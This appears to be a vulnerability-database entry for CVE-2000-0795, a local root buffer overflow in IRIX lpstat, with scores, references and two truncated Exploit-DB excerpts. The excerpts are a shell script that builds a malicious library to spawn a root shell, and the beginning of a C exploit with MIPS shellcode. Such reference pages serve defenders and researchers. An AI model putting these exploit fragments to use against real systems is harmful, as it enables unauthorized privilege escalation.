CVE-2000-0795
published 2000-10-20CVE-2000-0795: Buffer overflow in lpstat in IRIX 6.2 and 6.3 allows local users to gain root privileges via a long -n option.
PriorityP425high7.2CVSS 2.0
AVLACLAuNCCICAC
EXPLOIT
EPSS
1.17%
63.6th percentile
Buffer overflow in lpstat in IRIX 6.2 and 6.3 allows local users to gain root privileges via a long -n option.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sgi | irix | — | — |
| sgi | irix | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/bin/lpstat' Local Overflow / Local Privilege Escalation
exploitdb·2001-05-07
CVE-2000-0795 IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/bin/lpstat' Local Overflow / Local Privilege Escalation
IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/bin/lpstat' Local Overflow / Local Privilege Escalation
---
#!/bin/sh
## copyright LAST STAGE OF DELIRIUM jul 2000 poland *://lsd-pl.net/ #
## /usr/bin/lpstat #
EXECUTABLE=/usr/bin/lpstat
FILE=file
LIBRARY=lsd
DIRECTORY=tmp
cd $DIRECTORY
cat > $FILE > $FILE
chmod 666 $FILE
cat > $LIBRARY.c << 'EOF'
OpenConn(){
printf("copyright LAST STAGE OF DELIRIUM jul 2000 poland //lsd-pl.net/\n");
printf("/usr/bin/lpstat for irix 5.3 6.2 6.3 6.4 6.5 6.5.11 IP:all\n");
printf("\n");
setreuid(getuid(),0);setuid(0);setgid(0);
execl("/bin/sh","sh",0);
}
CloseConn(){} ListPrinters(){} SendJob(){} CancelJob(){} WaitForJob(){}
GetQueue(){} StartTagging(){} StopTagging(){} Install(){} AddTimeout(){}
RemoveSemiColons(){} CreateInterface(){} InstallPrinter(){}
InstallI
Exploit-DB
IRIX 6.2/6.3 - '/bin/lpstat' Local Buffer Overflow
exploitdb·1998-11-01
CVE-2000-0795 IRIX 6.2/6.3 - '/bin/lpstat' Local Buffer Overflow
IRIX 6.2/6.3 - '/bin/lpstat' Local Buffer Overflow
---
/*
source: https://www.securityfocus.com/bid/1529/info
Certain versions of IRIX ship with a version of lpstat which is vulnerable to a buffer overflow attack. The program, lpstat, is used to check the status of the printer being used by the IRIX machine. The problem is in the command line parsing section of the code whereby a user can supply an overly long string and overflow the buffer resulting in a possible root compromise.
*/
/*## copyright LAST STAGE OF DELIRIUM nov 1998 poland *://lsd-pl.net/ #*/
/*## /bin/lpstat #*/
#define NOPNUM 468
#define ADRNUM 300
#define PCHNUM 300
char setreuidcode[]=
"\x30\x0b\xff\xff" /* andi $t3,$zero,0xffff */
"\x24\x02\x04\x01" /* li $v0,1024+1 */
"\x20\x42\xff\xff" /* addi $v0,$v0,-1 */
"\x03
No writeups or analysis indexed.
http://www.osvdb.org/1485http://www.securityfocus.com/bid/1529http://www.securityfocus.com/templates/archive.pike?list=1&msg=200008021924.e72JOVs12558%40ix.put.poznan.plhttp://www.osvdb.org/1485http://www.securityfocus.com/bid/1529http://www.securityfocus.com/templates/archive.pike?list=1&msg=200008021924.e72JOVs12558%40ix.put.poznan.pl
2000-10-20
Published